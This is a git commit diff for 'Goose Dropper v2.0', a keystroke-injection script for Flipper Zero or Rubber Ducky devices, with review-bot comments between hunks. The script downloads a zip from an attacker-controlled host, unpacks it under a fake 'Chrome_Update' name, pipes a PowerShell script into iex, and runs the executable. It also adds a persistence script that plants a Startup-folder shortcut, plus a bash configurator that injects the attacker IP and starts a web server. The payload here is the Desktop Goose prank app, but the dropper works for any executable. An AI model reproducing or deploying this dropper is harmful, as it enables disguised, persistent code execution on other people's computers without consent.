Dropper v2.0

Fr3ki
2023-10-31 15:10:53 -06:00
parent 51df053bc7
commit 665b59a62a
10 changed files with 122 additions and 23 deletions
+7 -2
@@ -4,9 +4,9 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r
DELAY 500 DELAY 500
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell wget YOUR_IP:1337/update.zip -OutFile $ENV:Temp/Updater.zip STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
ENTER ENTER
DELAY 5000 DELAY 8000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
@@ -14,5 +14,10 @@ ENTER
DELAY 3000 DELAY 3000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
ENTER
DELAY 1000
GUI r
DELAY 500
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
ENTER ENTER
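Review bot: The header comment still describes this payload as download-and-run only, while the lines added after the `Expand-Archive` step now pipe `PersistentGoose.ps1` into `iex`, which changes what is left behind on the machine. The `REM DESCRIPTION` line sits above this hunk; it should say that a Startup-folder shortcut is created, and a cleanup line would help whoever has to undo a test run, e.g. `REM CLEANUP Delete HONK.lnk from the user's Startup folder, then %TEMP%\Chrome_Update and %TEMP%\Updater.zip`. For triage, every step is launched through the Run dialog, so the commands should show up in the user's RunMRU history and in PowerShell logging where that is enabled. The same text is added again as the 23-line backup file further down.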
@@ -0,0 +1,6 @@
$WScriptShell = New-Object -ComObject WScript.Shell
$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
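Review bot: This new script has no comment saying what it does, and what it does is install a logon persistence item: a shortcut named `HONK.lnk` in the per-user Startup folder pointing at `GooseDesktop.exe` under `$env:Temp\Chrome_Update`. A header such as `# Creates a Startup-folder shortcut so GooseDesktop.exe relaunches at logon; delete HONK.lnk to undo` would make that explicit. A `.lnk` in Startup whose target lives under the Temp directory is a pattern defenders commonly alert on (ATT&CK T1547.001), so the README should also tell testers how to remove it afterwards. The identical six lines are added a second time later in this commit as the backup copy.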
+14 -10
@@ -1,23 +1,27 @@
======= Goose Dropper ======== **======= Goose Dropper v2.0 ========**
This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose on a Windows PC. This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
------------------------------------------------------------------------------------------------------
Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually: Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
1) Replace the YOUR_IP value in GooseDropper.txt with your IP 1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
2) Download Desktop Goose and extract it, rename the DesktopGoose v.031 from inside the zip to Update 2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update.
3) Re-ZIP the Update directory and name it Chrome_Updater.txt 3) Copy PersistentGoose.ps1 into the newly renamed Update folder.
4) Start some form of simple webserver/fileshare on port 1337 4) Re-ZIP the Update directory and name it Chrome_Updater.txt.
5) Copy to your Flipper or Rubber-Ducky and PWN! 5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice).
Important Notes: 6) Copy to your Flipper or Rubber-Ducky and PWN!
--------------------------------------------------------------------------------------------------------------
**Important Notes:**
Ensure configuration is run while on the same network as your target, re-configure with each new network. Ensure configuration is run while on the same network as your target, re-configure with each new network.
Currently a reboot will kill the process, however persistance is being worked on.
All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
+55 -6
@@ -1,15 +1,44 @@
#!/bin/bash #!/bin/bash
#Determine the source of the DesktopGoose download
echo "1) Local Webserver | 2) Persistant URL"
read -p "Select a download source [1/2]: " DL
if [ "${DL}" == "1" ];
then
echo "Grabbing your IP"
#Grab your local IP to add to the payload #Grab your local IP to add to the payload
SRC="$(ip route show | grep default | cut -d ' ' -f 9)" SRC="$(ip route show | grep default | cut -d ' ' -f 9)"
#Add your IP to the payload
sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt
sleep 5s && clear
elif [ "${DL}" == "2" ];
then
#Get your URL
read -p "Enter your URL: " SRC
#Add your URL to the payload
sed -i "s/powershell wget YOUR_IP:1337 -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
#Remind users to have the zip ready
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
sleep 5s && clear
else
echo "Please enter a valid selection"
exit
fi
#Check if Desktop Goose is present in this directory #Check if Desktop Goose is present in this directory
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')" GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
#Add the IP to the payload
sed -i "s/YOUR_IP/$SRC/" GooseDroper.txt
#Check
if [ "${GOOSE}" == "" ]; if [ "${GOOSE}" == "" ];
then then
echo "Desktop Goose is not present in this directory, download it, or move it here" echo "Desktop Goose is not present in this directory, download it, or move it here"
@@ -18,16 +47,36 @@ then
else else
unzip "Desktop Goose v0.31.zip" unzip "Desktop Goose v0.31.zip"
mv "Desktop Goose v0.31/DesktopGoose v0.31" Update mv "Desktop Goose v0.31/DesktopGoose v0.31" Update
mv PersistentGoose.ps1 Update/
zip -r Chrome_Update.zip Update zip -r Chrome_Update.zip Update
rm -rf "Desktop Goose v0.31"* Update rm -rf "Desktop Goose v0.31"* Update
read -p "Configuration finished! Start python webserver now? [Y/N]" START clear
fi fi
read -p "Configure Persistence? [Y/N]: " PERSIST
if [ "${PERSIST,,}" == "n" ];
then
sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
else
break
fi
if [ "${DL}" == "1" ];
then
clear
read -p "Configuration finished! Start python webserver now? [Y/N]: " START
clear
else
clear
break
fi
if [ "${START,,}" == "y" ]; if [ "${START,,}" == "y" ];
then then
echo "Starting Server... Happy PWNing! (don't be a skid)"
python3 -m http.server 1337 && echo "PWNED!" python3 -m http.server 1337 && echo "PWNED!"
else else
clear clear
echo "Server not started, thank you!" echo "Finished... Happy PWNing (don't be a skid)!"
fi fi
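Review bot: `break` is used in the two new `else` branches (after the persistence prompt and after the second `DL` check) although neither sits inside a loop; bash only complains there, so those branches do nothing useful and should be dropped or replaced with `:`. The persistence prompt also treats every answer except `n` as consent, including an empty line; making it opt-in with `if [ "${PERSIST,,}" != "y" ];` before the `sed -i` deletion is the safer default. The invalid-selection path ends in a bare `exit`, which returns the status of the preceding `echo`; `exit 1` would let a caller see the failure.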
@@ -0,0 +1,23 @@
REM TITLE GooseDropper
REM AUTHOR Fr3ki
REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
DELAY 500
GUI r
DELAY 500
STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
ENTER
DELAY 8000
GUI r
DELAY 500
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
ENTER
DELAY 3000
GUI r
DELAY 500
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
ENTER
DELAY 1000
GUI r
DELAY 500
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
ENTER
@@ -0,0 +1,6 @@
$WScriptShell = New-Object -ComObject WScript.Shell
$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
@@ -0,0 +1,6 @@
#!/bin/bash
cp PersistentGoose.ps1.bk PersistentGoose.ps1
cp "bk_Desktop Goose v0.31.zip" "Desktop Goose v0.31.zip"
cp GooseDropper.txt.bk GooseDropper.txt
rm Chrome_Update.zip
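Review bot: Nothing in this reset script checks that the three `cp` commands succeeded, and `rm Chrome_Update.zip` errors when the archive was never built. Adding `set -eu` under the shebang and using `rm -f -- Chrome_Update.zip` would make a partial restore stop visibly instead of continuing. A one-line comment saying that it appears to restore the `.bk` copies altered by the configuration script would also help.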